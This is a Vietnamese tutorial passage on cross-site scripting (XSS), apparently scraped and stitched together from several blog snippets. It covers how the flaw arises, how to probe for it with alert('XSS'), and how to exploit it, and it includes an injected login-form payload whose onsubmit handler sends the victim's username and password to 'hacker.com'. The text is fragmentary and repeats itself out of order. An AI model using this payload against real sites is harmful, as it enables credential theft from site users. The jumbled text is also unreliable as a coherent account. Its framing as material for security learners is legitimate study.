Lỗi này xảy ra khi ứng dụng web thu nhận các dữ liệu nguy hiểm được nhập từ hacker . Như bạn đã biết thì 1 website thường chứa các link , thông qua các link này hacker có thể chèn các đoạn code vào và khi người dùng nào đó sử dụng link này ,nói nôm na là hacker có thể thông qua lỗi này để chèn code vào site hay link để chôm các thông tin quan trọng từ nạn nhân, các thông tin quan trọng ở đây có thể là cookie hoặc username + pass đểvào tài khoản 1 ngân hàng nào đó sau đó thông tin này được gửi tới cho hacker. Tài liệu dành cho các bạn nghiên cứu về bảo mật.
[...]... hacker khi phát hiện ra lỗi XSS sẽ cố gắng dùng nó để lấy cookies, tạo các trang login giả để lấy pass của người khác v v Bây giờ chúng ta bắt đầu đi sâu vào lỗi XSS , trước tiên là xác định site dính lỗi này : Ví dụ một công cụ tìm kiếm của site sau khi được ta nhập giá trị ( ví dụ : XSS ) nó sẽ trả về những gì mà ta vừa nhập ( tức in ra XSS ) thì rất có khả năng nó bị dính XSS Bây giờ ta view source... tại 1 site mua bán , thêm dữ liệu v v v Hi vong bài viết này có thể giúp các bạn newbie như mình phần nào hiểu thêm về XSS À với các bạn chưa biết XSS là gì sau khi đọc xong bài này thì các bạn đọc lại bài của anh Mask_NBTA_83 ý Bài đấy sẽ giúp ích nhiều đấy Khi nào kiếm thêm bài về XSS mình sẽ cố vít 1 bài nữa nếu ko ai thấy phiền hè hè bài trên mình đã nói qua về lỗi XSS và cách khai thác của nó... tiêm mã HTML và javascript vào trang wweb này được ko Đơn giản chỉ cần thay "Invalid%20Login:%20Badlogin " ở URL trên bằng alert( 'XSS' ) , nếu sau đó ta nhận được 1 cửa sổ pop-up với thông báo XSS thì ta hoàn toàn có thể khai thác site này qua lỗi XSS Anh ta bây giờ phải tạo 1 URL để có thể lấy được các thông tin nhạy cảm Để tạo được 1 URL mà có khả năng qua mặt được nhiều người thì... action="login.asp" method="post" onsubmit="XSSimage= new Image; XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms( 1).password.value;"> Username :Password: Như ta thấy , đoạn code được "tiêm " vào gồm 2 phần chính , một là để kết thúc của bản gốc , hai là . chan doi Đây là những bài viết về XSS mà tôi sưu tầm được, hy vọng giúp các bạn hiểu hơn 1 chút về vấn đề này Trước hết là bài viết của Mask_NBTA XSS cơ bản Lỗi xảy ra như thế nào ? . giá trị ( ví dụ : XSS ) nó sẽ trả về những gì mà ta vừa nhập ( tức in ra XSS ) thì rất có khả năng nó bị dính XSS . Bây giờ ta view source của site đấy nếu tìm thấy " XSS " thì đích. results, error messages , Web-form , chủ yếu lỗi XSS nằm ở các phần này , nói chung là XSS có thể xảy ra ở chỗ nào mà người dùng có thể nhập dữ liệu vào và sau đó sẽ nhận được 1 cái gì đó .